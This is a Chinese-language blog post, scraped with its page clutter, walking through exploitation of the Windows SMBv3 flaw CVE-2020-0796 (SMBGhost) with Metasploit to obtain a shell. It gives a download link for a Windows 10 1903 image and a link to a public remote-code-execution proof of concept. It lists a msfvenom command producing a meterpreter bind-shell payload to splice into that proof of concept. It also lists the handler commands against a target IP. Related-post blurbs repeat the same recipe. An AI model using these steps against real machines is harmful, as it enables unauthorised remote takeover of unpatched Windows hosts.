Metasploit系列 -- CVE-2020-0796(永恒之黑)getshell

最新推荐文章于 2023-07-06 17:46:39 发布
最新推荐文章于 2023-07-06 17:46:39 发布
阅读量2.5k 收藏 11
点赞数
分类专栏: web安全工具库 文章标签: Metasploit CVE-2020-0796 永恒之黑 getshell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/106559833
版权

会遗憾,但不会后悔,会争取,但不会强求,能低头,但有底线,全妥协,但有原则,希望这能是你。。。。

---- 网易云热评

本篇内容来自雷石安全实验室。

一、漏洞描述:

该漏洞是由SMBv3处理恶意制作的压缩数据包,未经认证攻击者可能利用此漏洞执行任意代码。

 

二、测试环境及工具:

windows10 1903 64位下载:

ed2k://|file|cn_windows_10_consumer_editions_version_1903_x64_dvd_8f05241d.iso|4905476096|F28FDC23DA34D55BA466BFD6E91DD311|/

CVE-2020-0796 "poc"下载:

https://github.com/chompie1337/SMBGhost_RCE_PoC

 

三、漏洞利用

1、生成反向连接木马:

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python

2、替换POC,将上面生成的代码替换原文中的代码

 

3、启动Metasploit监听

use exploit/multi/handler

set payload windows/x64/meterpreter/bind_tcp

set lport 4444

set rhost 192.168.1.143  目标主机

run

3、运行poc,自动建立连接

 

禁止非法,后果自负

欢迎关注公众号:web安全工具库

 

web安全工具库
关注
  • 0
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CVE-2020-0796-PoC-master.zip
06-11
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发缓冲区溢出,可能被攻击者利用远程执行任意代码。 SMBV3在通信过程中默认启动压缩/解压缩机制。如下图所示,攻击者在SMB压缩转换包的协议头中对OriginalSize值可控,这样OriginalSize以一个极大的值,写入固定的缓冲区中,造成缓冲区溢出。精心构造后可执行恶意命令。也就是压缩时所申请的内存大小小于解压后的大小,造成缓冲区溢出。
永恒CVE-2020-0796
小白一枚多多关注的博客
11-16 1万+
2017年时微软爆出了高危漏洞——永恒之蓝,3年后微软又爆出了一个继永恒之蓝的高危漏洞——永恒,该漏洞所瞄准的服务都是SMB服务,额,在此不得不说,SMB服务既然那么鸡肋不如换一个来代替它,那样还能剩出一大笔钱来做操作系统的优化..... 今天我们来介绍永恒之蓝的姊妹篇——永恒(因为名字太像了,所以我就给他们认了个亲戚)。 对了,该漏洞好像不针对windows7,它是为了windows10来的。 实验环境: kali windows10 ...
CVE-2020-0796蓝屏POC 漏洞复现
ltt440888的博客
03-19 6302
微软SMBv3远程代码执行漏洞(CVE-2020-0796) 1、漏洞描述 微软SMBv3远程代码执行漏洞(SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码)可被攻击者利用,实现无须权限即可执行远程代码,受攻击的目标系统只需开机在线即可能被入侵。该漏洞后果十分接近永恒之蓝系列,存在被WannaC...
kali永恒
weixin_43585088的博客
06-07 5423
CVE-2020-07961 目标主机2 漏洞检测3 准备一下如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 永恒 CVE-2020-0796复现 1 目标主机 1.1 目标主机开放445端口 1.2 可以ping通,这里需要目标主机关闭防火墙或者修改策略了 1.2
CVE_2020_0796重大windows SMB RCE漏洞
weixin_39811856的博客
03-13 482
描述如下: 漏洞是因为操作系统在处理SMBv3协议中的压缩数据包时存在错误处理。 成功构造数据包的攻击者可在远程无验证的条件下利用该漏洞执行任意代码。 易被感染系统: + Windows 10 Version 1903 for 32-bit Systems + Windows 10 Version 1903 for ARM64-based Systems + Windows 1...
CVE-2020-0796漏洞复现
快吃小蛋糕吧的博客
11-08 1866
即17年永恒之蓝后,又爆出永恒,445不愧是安全工程师的噩梦。 漏洞简介 Microsoft Windows和Microsoft Windows Server都是美国微软(Microsoft)公司的产品。Microsoft Windows是一套个人设备使用的操作系统。Microsoft Windows Server是一套服务器操作系统。Server Message Block是其中的一个服务器信息传输协议。 Microsoft Server Message Block 3.1.1 (SMBv3)版本.
CVE-2020-0796永恒) getshell
小石头的博客
06-05 2110
前期准备 Windows10 1903版本下载:http://www.xitongtiandi.net/wenzhang/zuixin/33042.html 迅雷下载Windows10 pro1903 x64: thunder://QUFodHRwOi8veHoxLmRhb2hhbmc0LmNvbS9jbl93aW5kb3dzXzEwX2NvbnN1bWVyX2VkaXRpb25zX3ZlcnNpb25fMTkwM194NjRfZHZkXzhmMDUyNDFkLmlzb1pa CVE-202...
msf教学CVE-2020-0796攻击及修复
arissa666的博客
07-06 375
声明:本内容非真实商用网站,均为个人手工自行搭建的虚拟网站,仅为个人练习,无任何商业获利或者侵权行为。cd进入到刚才保存的目录,用python3 CVE-2020-0796.py 主机地址,进行poc攻击。用下载好的文件检测目标主机是否有漏洞: python3 扫描文件 目标主机。把刚才复制的一堆文件整理下格式,替换到exploit.py里面,保存。命令行打开这目录,exploit.py就是刚才替换内容的文件。另外开一个kali连接,用mf启动监听器。回到刚才的会话,用exploit进行攻击。
永恒CVE-2020-0796 微软SMBv3协议远程代码执行漏洞)
曹振国的博客
07-26 1961
文章目录一、漏洞简介:二、影响版本:三、实验环境:四、漏洞复现1.下载CVE-2020-0796漏洞扫描工具,对网段进行扫描2.蓝屏复现3.远程执行复现 一、漏洞简介: 3月12日,微软更新安全通告针对Windows SMBv3客户端/服务器远程代码执行漏洞紧急发布了安全补丁,确定该漏洞编号为CVE-2020-0796。 Microsoft Server Message Block 3.1.1(SMBv3)协议在处理某些请求的方式中存在代码执行漏洞。攻击者可以精心构造数据包发送到SMB服务器,无需经过身份
【漏洞复现】CVE-2020-0796永恒漏洞复现
热门推荐
qq_45244158的博客
03-29 1万+
文章目录一、漏洞描述二、影响版本三、漏洞检测四、漏洞复现环境五、(1)漏洞利用之蓝屏五、(2)漏洞利用之本地提权五、(3)漏洞利用之反弹shell1、使用msfvenom生成payload2、替换payload3. 开启msf监听模块4. 运行exploit.py脚本,发起攻击反弹shell5. 执行成功,查看监听的地方,成功得到shell六、修复建议1.安装官方补丁2.禁用SMBv3压缩3.设置防火墙策略关闭相关端口4.通过IP安全策略屏蔽危险端口,bat执行添加防火墙策略,关闭危险服务 一、漏洞描述.
CVE-2020-0796 POC EXP.zip
04-01
CVE-2020-0796的poc检测代码。 CVE-2020-0796本地exp执行代码。
CVE-2020-0796-POC.py
03-19
微软SMBv3远程代码执行漏洞(SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码)可被攻击者利用,实现无须权限即可执行远程代码,受攻击的目标系统只需开机在线即可能被入侵。该漏洞后果十分接近永恒之蓝系列,存在被WannaCry等勒索蠕虫利用的可能,攻击者可以构造特定的网页、压缩包、共享目录、Offic文档等多种方式触发漏洞进行攻击,对存在该漏洞的Windows主机造成严重威胁。
metasploitframework-latest.msi
09-17
metasploitframework-latest.msi
Mastering-Metasploit:掌握Metasploit书中的Metasploit模块
05-17
此存储库包含《掌握Metasploit手册》中涵盖的模块: #要将所有模块自动加载到metasploit: ... 将所有模块从book_meterpreter_scripts复制到/ usr / share / metasploit-framework / scripts / meterpreter
metasploitframework-win-x64
10-05
Metasploit Framework 作为一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变得方便和简单。 使用...
python-sploitkit:用于构建类似Metasploit的控制台的Devkit
05-14
介绍该工具包旨在以类似于Metasploit的样式轻松构建框架控制台。 它提供了一个全面的界面来为其存储数据库定义CLI命令,模块和模型。设置pip install sploitkit用法从这一点来看, main.py具有以下代码: #!/usr/bin...
2021数学建模美赛C题代码.zip
04-24
最全的数学建模美赛C题和代码、大量刷题题库、逻辑清晰易于学习
这是一个保存Springboot+MyBaits项目的仓库.zip
最新发布
04-24
springboot框架 一、Spring Boot基础应用 Spring Boot特征 概念: 约定优于配置,简单来说就是你所期待的配置与约定的配置一致,那么就可以不做任何配置,约定不符合期待时才需要对约定进行替换配置。 特征: 1. SpringBoot Starter:他将常用的依赖分组进行了整合,将其合并到一个依赖中,这样就可以一次性添加到项目的Maven或Gradle构建中。 2,使编码变得简单,SpringBoot采用 JavaConfig的方式对Spring进行配置,并且提供了大量的注解,极大的提高了工作效率,比如@Configuration和@bean注解结合,基于@Configuration完成类扫描,基于@bean注解把返回值注入IOC容器。 3.自动配置:SpringBoot的自动配置特性利用了Spring对条件化配置的支持,合理地推测应用所需的bean并自动化配置他们。 4.使部署变得简单,SpringBoot内置了三种Servlet容器,Tomcat,Jetty,undertow.我们只需要一个Java的运行环境就可以跑SpringBoot的项目了
metasploitframework-latest
07-13
Metasploit Framework 是一个开源的渗透测试工具,它提供了一系列的漏洞利用模块、Payload生成器和其他辅助工具,帮助安全专业人员评估系统和网络的安全性。 要获取最新版本的 Metasploit Framework,你可以按照...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值